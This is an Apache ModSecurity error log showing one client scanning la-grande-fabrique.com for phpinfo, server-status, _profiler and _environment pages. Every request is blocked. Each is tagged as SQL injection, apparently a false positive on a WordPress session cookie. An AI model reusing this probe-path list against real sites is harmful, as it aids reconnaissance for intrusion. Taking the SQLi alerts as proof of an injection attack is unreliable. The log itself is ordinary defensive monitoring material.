[Mon May 11 14:10:43.141274 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/old/phpinfo.php"] [unique_id "agHHQ6y-5-wpj6Sx56aBZQAAABU"]
[Mon May 11 14:10:43.141514 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/old/phpinfo.php"] [unique_id "agHHQ6y-5-wpj6Sx56aBZQAAABU"]
[Mon May 11 14:10:43.412473 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/tmp/phpinfo.php"] [unique_id "agHHQ6y-5-wpj6Sx56aBZgAAABU"]
[Mon May 11 14:10:43.412681 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/tmp/phpinfo.php"] [unique_id "agHHQ6y-5-wpj6Sx56aBZgAAABU"]
[Mon May 11 14:10:43.412930 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/tmp/phpinfo.php"] [unique_id "agHHQ6y-5-wpj6Sx56aBZgAAABU"]
[Mon May 11 14:10:43.601292 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/public/phpinfo.php"] [unique_id "agHHQ6y-5-wpj6Sx56aBaAAAABU"]
[Mon May 11 14:10:43.601515 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/public/phpinfo.php"] [unique_id "agHHQ6y-5-wpj6Sx56aBaAAAABU"]
[Mon May 11 14:10:43.601780 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/public/phpinfo.php"] [unique_id "agHHQ6y-5-wpj6Sx56aBaAAAABU"]
[Mon May 11 14:10:43.790837 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/info"] [unique_id "agHHQ6y-5-wpj6Sx56aBaQAAABU"]
[Mon May 11 14:10:43.791038 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/info"] [unique_id "agHHQ6y-5-wpj6Sx56aBaQAAABU"]
[Mon May 11 14:10:43.791296 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/info"] [unique_id "agHHQ6y-5-wpj6Sx56aBaQAAABU"]
[Mon May 11 14:10:44.038902 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/php-info.php"] [unique_id "agHHRKy-5-wpj6Sx56aBagAAABU"]
[Mon May 11 14:10:44.039113 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/php-info.php"] [unique_id "agHHRKy-5-wpj6Sx56aBagAAABU"]
[Mon May 11 14:10:44.039381 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/php-info.php"] [unique_id "agHHRKy-5-wpj6Sx56aBagAAABU"]
[Mon May 11 14:10:44.212026 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/phpversion.php"] [unique_id "agHHRKy-5-wpj6Sx56aBawAAABU"]
[Mon May 11 14:10:44.212251 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/phpversion.php"] [unique_id "agHHRKy-5-wpj6Sx56aBawAAABU"]
[Mon May 11 14:10:44.212509 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/phpversion.php"] [unique_id "agHHRKy-5-wpj6Sx56aBawAAABU"]
[Mon May 11 14:10:44.385645 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/_phpinfo.php"] [unique_id "agHHRKy-5-wpj6Sx56aBbAAAABU"]
[Mon May 11 14:10:44.385852 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/_phpinfo.php"] [unique_id "agHHRKy-5-wpj6Sx56aBbAAAABU"]
[Mon May 11 14:10:44.386107 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/_phpinfo.php"] [unique_id "agHHRKy-5-wpj6Sx56aBbAAAABU"]
[Mon May 11 14:10:44.611787 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/old_phpinfo.php"] [unique_id "agHHRKy-5-wpj6Sx56aBbgAAABU"]
[Mon May 11 14:10:44.611973 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/old_phpinfo.php"] [unique_id "agHHRKy-5-wpj6Sx56aBbgAAABU"]
[Mon May 11 14:10:44.612208 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/old_phpinfo.php"] [unique_id "agHHRKy-5-wpj6Sx56aBbgAAABU"]
[Mon May 11 14:10:44.671043 2026] [core:error] [pid 1320398:tid 1320420] [client 52.242.216.199:59639] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:44.671078 2026] [core:error] [pid 1320398:tid 1320420] [client 52.242.216.199:59639] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:10:44.815074 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/server-info.php"] [unique_id "agHHRKy-5-wpj6Sx56aBbwAAABU"]
[Mon May 11 14:10:44.815306 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/server-info.php"] [unique_id "agHHRKy-5-wpj6Sx56aBbwAAABU"]
[Mon May 11 14:10:44.815592 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/server-info.php"] [unique_id "agHHRKy-5-wpj6Sx56aBbwAAABU"]
[Mon May 11 14:10:45.042864 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/server-status.php"] [unique_id "agHHRay-5-wpj6Sx56aBcAAAABU"]
[Mon May 11 14:10:45.043065 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/server-status.php"] [unique_id "agHHRay-5-wpj6Sx56aBcAAAABU"]
[Mon May 11 14:10:45.043344 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/server-status.php"] [unique_id "agHHRay-5-wpj6Sx56aBcAAAABU"]
[Mon May 11 14:10:45.206783 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/_profiler/phpinfo"] [unique_id "agHHRay-5-wpj6Sx56aBcQAAABU"]
[Mon May 11 14:10:45.206982 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/_profiler/phpinfo"] [unique_id "agHHRay-5-wpj6Sx56aBcQAAABU"]
[Mon May 11 14:10:45.207220 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/_profiler/phpinfo"] [unique_id "agHHRay-5-wpj6Sx56aBcQAAABU"]
[Mon May 11 14:10:45.375261 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/_environment"] [unique_id "agHHRay-5-wpj6Sx56aBcwAAABU"]
[Mon May 11 14:10:45.375440 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/_environment"] [unique_id "agHHRay-5-wpj6Sx56aBcwAAABU"]
[Mon May 11 14:10:45.375676 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/_environment"] [unique_id "agHHRay-5-wpj6Sx56aBcwAAABU"]
[Mon May 11 14:10:45.564312 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/webroot/index.php/_environment"] [unique_id "agHHRay-5-wpj6Sx56aBdAAAABU"]
[Mon May 11 14:10:45.564510 2026] [security2:error] [pid 1319886:tid 1319933] [client 54.255.173.22:45148] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/webroot/index.php/_environment"] [unique_id "agHHRay-5-wpj6Sx56aBdAAAABU"]
